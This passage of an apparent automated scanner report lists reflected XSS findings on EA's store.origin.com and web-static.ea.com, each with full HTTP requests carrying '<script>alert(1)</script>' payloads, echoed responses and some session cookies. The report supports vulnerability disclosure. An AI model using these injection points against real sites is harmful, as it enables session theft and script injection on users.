User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247?a9c7d--%3E%3Cscript%3Ealert(0x062)%3C/script%3E84252b80866=1
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=688587274.260.0000; ORA_WX_SESSION=10.2.11.49:260-0#0; JSESSIONID=D16C78DD65928965E35E73DFD8E01BF0; VISITOR_ID=971D4E8DFAED43671E5F8C17C533E4FF95647E15D19DC326

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=21784804153,0)
Date: Fri, 24 Jun 2011 14:25:50 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app41
Content-Length: 75613


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308925551009:NODE=c2a4101:THREA
...[SNIP]...
<!--!esi:include src="/store?Action=DisplayESIPage&Currency=USD&ESIHC=7130d483&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&cba28--><script>alert(1)</script>988e2a37d0c=1&ceid=173716600&cename=TopHeader&id=ProductDetailsPage&productID=201797000&script>
...[SNIP]...
4.95. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.origin.com
Path:   /store/ea/home/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 69277--><script>alert(1)</script>db7d3c456c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /store/ea/home/?69277--><script>alert(1)</script>db7d3c456c5=1 HTTP/1.1
Host: store.origin.com
Proxy-Connection: keep-alive
Referer: http://store.origin.com/store?Action=DisplayPage&Env=BASE&IsGift=no&Locale=en_US&SiteID=ea&id=ThreePgCheckoutShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerp-drh-dc2superpod-store-origin-com-limited-active=3926000138.260.0000; ORA_WX_SESSION="10.2.2.234:260-0#0"; JSESSIONID=30CFA2BD1E6A3F496EF263111AA24A27; s_sivo=US%3AEASTORENA%3ANONE; s_ria=flash%2010%7Csilverlight%20not%20detected; VISITOR_ID=971D4E8DFAED43677EB6A18EC8126591F797C43C4FA846C0; s_cc=true; s_sq=eaeacom%2Ceaeacomna%2Ceastorena%3D%2526pid%253DNA%25253AUS%25253ASTORE%25253ANONE%25253ASTORE%25253ANONE%25253AEASTORENA%25253ANONE%25253ASHOPPINGCART%2526pidt%253D1%2526oid%253Dhttp%25253A//store.origin.com/store/ea/home/%2526ot%253DA

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=215059140235,0)
Date: Fri, 24 Jun 2011 14:38:59 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app42
Content-Length: 64998


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- REQUEST ID: TIME=1308926339848:NODE=c2a4201:THREA
...[SNIP]...
<!--!esi:include src="/store?69277--><script>alert(1)</script>db7d3c456c5=1&Action=DisplayESIPage&Currency=USD&ESIHC=24e5cc79&Env=BASE&Locale=en_US&SiteID=ea&StyleID=1364100&StyleVersion=247&ThemeID=718200&ceid=173716600&cename=TopHeader&id=HomePage&script>
...[SNIP]...
4.96. http://web-static.ea.com/us/favicon.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/favicon.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f68b"><script>alert(1)</script>bb832b5d563 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/8f68b"><script>alert(1)</script>bb832b5d563?ver=582_en_US HTTP/1.1
Host: web-static.ea.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30469
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 14:09:14 GMT
Date: Fri, 24 Jun 2011 14:09:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/8f68b"><script>alert(1)</script>bb832b5d563" />
...[SNIP]...
4.97. http://web-static.ea.com/us/portal/css/base/js-dependant/game_gamefeatures.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/game_gamefeatures.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e510"><script>alert(1)</script>5089f3d5a79 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/7e510"><script>alert(1)</script>5089f3d5a79?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/7e510"><script>alert(1)</script>5089f3d5a79" />
...[SNIP]...
4.98. http://web-static.ea.com/us/portal/css/base/js-dependant/hideOnLoad.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/hideOnLoad.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 483be"><script>alert(1)</script>ad62f3e1566 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/483be"><script>alert(1)</script>ad62f3e1566?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/483be"><script>alert(1)</script>ad62f3e1566" />
...[SNIP]...
4.99. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-facebox.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery-facebox.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2565"><script>alert(1)</script>c7ff191df6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/a2565"><script>alert(1)</script>c7ff191df6?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30497
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:48 GMT
Date: Fri, 24 Jun 2011 13:43:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/a2565"><script>alert(1)</script>c7ff191df6" />
...[SNIP]...
4.100. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-ui.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery-ui.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d142"><script>alert(1)</script>69d8b1784d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/9d142"><script>alert(1)</script>69d8b1784d3?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:51 GMT
Date: Fri, 24 Jun 2011 13:43:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/9d142"><script>alert(1)</script>69d8b1784d3" />
...[SNIP]...
4.101. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.eventcalendar.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.eventcalendar.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8628d"><script>alert(1)</script>fd4414aa5ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/8628d"><script>alert(1)</script>fd4414aa5ab?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/8628d"><script>alert(1)</script>fd4414aa5ab" />
...[SNIP]...
4.102. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.pagination.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.pagination.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ab03"><script>alert(1)</script>4c01e624c5d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/7ab03"><script>alert(1)</script>4c01e624c5d?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/7ab03"><script>alert(1)</script>4c01e624c5d" />
...[SNIP]...
4.103. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.slider.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/js-dependant/jquery.slider.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2927e"><script>alert(1)</script>b1174e8b08a was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/js-dependant/2927e"><script>alert(1)</script>b1174e8b08a?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30498
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/js-dependant/2927e"><script>alert(1)</script>b1174e8b08a" />
...[SNIP]...
4.104. http://web-static.ea.com/us/portal/css/base/reset.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/reset.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9a45"><script>alert(1)</script>5f2c5191043 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/a9a45"><script>alert(1)</script>5f2c5191043?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/a9a45"><script>alert(1)</script>5f2c5191043" />
...[SNIP]...
4.105. http://web-static.ea.com/us/portal/css/base/utils.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/base/utils.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79f2e"><script>alert(1)</script>d4820574afe was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/base/79f2e"><script>alert(1)</script>d4820574afe?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30485
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:46 GMT
Date: Fri, 24 Jun 2011 13:43:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/base/79f2e"><script>alert(1)</script>d4820574afe" />
...[SNIP]...
4.106. http://web-static.ea.com/us/portal/css/ea_global_footer.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/ea_global_footer.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d055d"><script>alert(1)</script>b0f25b5562f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/d055d"><script>alert(1)</script>b0f25b5562f?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30479
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:47 GMT
Date: Fri, 24 Jun 2011 13:43:47 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/d055d"><script>alert(1)</script>b0f25b5562f" />
...[SNIP]...
4.107. http://web-static.ea.com/us/portal/css/ea_gus.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/ea_gus.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48ee"><script>alert(1)</script>3c17de4adf6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/d48ee"><script>alert(1)</script>3c17de4adf6?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 24 Jun 2011 13:43:49 GMT
Date: Fri, 24 Jun 2011 13:43:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln
...[SNIP]...
<link rel="canonical" href="http://www.ea.com/us/portal/css/d48ee"><script>alert(1)</script>3c17de4adf6" />
...[SNIP]...
4.108. http://web-static.ea.com/us/portal/css/gui.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://web-static.ea.com
Path:   /us/portal/css/gui.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18290"><script>alert(1)</script>dd234103871 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /us/portal/css/18290"><script>alert(1)</script>dd234103871?ver=379_en_US HTTP/1.1
Host: web-static.ea.com
Proxy-Connection: keep-alive
Referer: http://investors.ea.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.9
Pragma: no-cache
Status: 404 Not Found
Vary: Accept-Encoding
Access-Control-Allow-Origin: *
Content-Length: 30480
Content-Type: text/html; charset=utf-8
